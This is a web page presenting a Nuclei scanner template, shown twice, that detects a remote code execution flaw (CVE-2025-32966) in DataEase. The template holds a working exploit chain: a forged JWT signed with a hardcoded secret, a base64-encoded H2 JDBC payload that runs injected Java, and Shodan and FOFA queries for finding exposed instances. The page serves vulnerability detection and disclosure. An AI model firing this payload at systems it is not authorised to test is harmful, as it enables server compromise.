DataEase 2.10.4-2.10.7 - Remote Code Execution

CVE-2025-32966

Verified

Description

DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

Affected Product

dataease

Published Date

May 2, 2026

Template Author

chrisjr404

CVE-2025-32966.yaml

id: CVE-2025-32966

info:
  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
  author: ChrisJr404
  severity: critical
  description: |
    DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
  impact: |
    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 2.10.8 or later.
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
    - https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32966
    cwe-id: CWE-94
    epss-score: 0.05147
    epss-percentile: 0.90129
  metadata:
    verified: true
    max-request: 1
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2025,dataease,h2,rce,jdbc,oss

variables:
  unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"
  inner_payload: '{"jdbc":"jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{unique}}\")\\; }$$\\;CALL LK()","username":"","password":"","driver":"org.h2.Driver"}'
  conf_b64: "{{base64(inner_payload)}}"
  jwt_claims: '{"uid":1,"oid":1,"exp":{{unix_time(3600)}}}'
  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","ChrisJr404") }}'

http:
  - raw:
      - |
        POST /de2api/datasource/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-DE-TOKEN: {{forged_jwt}}

        {"name":"p","type":"h2","configuration":"{{conf_b64}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Exception calling user-defined function", "{{unique}}", "CREATE ALIAS LK")'
        condition: and
# digest: 490a004630440220407964c9a9b2cd0618bfc0fe03bf7b5a7633963f5fd4988ff5574483fa09f95602206e98faf290dcdc77cd49688ed6e20483020c8aafe9e39e5781b53caaa88e911a:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-32966

CWE ID:

cwe-94

References

https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7 https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966

Remediation Steps

Update to version 2.10.8 or later.

id: CVE-2025-32966

info:
  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
  author: ChrisJr404
  severity: critical
  description: |
    DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
  impact: |
    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 2.10.8 or later.
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
    - https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32966
    cwe-id: CWE-94
    epss-score: 0.05147
    epss-percentile: 0.90129
  metadata:
    verified: true
    max-request: 1
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2025,dataease,h2,rce,jdbc,oss

variables:
  unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"
  inner_payload: '{"jdbc":"jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{unique}}\")\\; }$$\\;CALL LK()","username":"","password":"","driver":"org.h2.Driver"}'
  conf_b64: "{{base64(inner_payload)}}"
  jwt_claims: '{"uid":1,"oid":1,"exp":{{unix_time(3600)}}}'
  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","ChrisJr404") }}'

http:
  - raw:
      - |
        POST /de2api/datasource/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-DE-TOKEN: {{forged_jwt}}

        {"name":"p","type":"h2","configuration":"{{conf_b64}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Exception calling user-defined function", "{{unique}}", "CREATE ALIAS LK")'
        condition: and
# digest: 490a004630440220407964c9a9b2cd0618bfc0fe03bf7b5a7633963f5fd4988ff5574483fa09f95602206e98faf290dcdc77cd49688ed6e20483020c8aafe9e39e5781b53caaa88e911a:922c64590222798bb761d5b6d8e72950

DataEase 2.10.4-2.10.7 - Remote Code Execution

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

DataEase 2.10.4-2.10.7 - Remote Code Execution

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps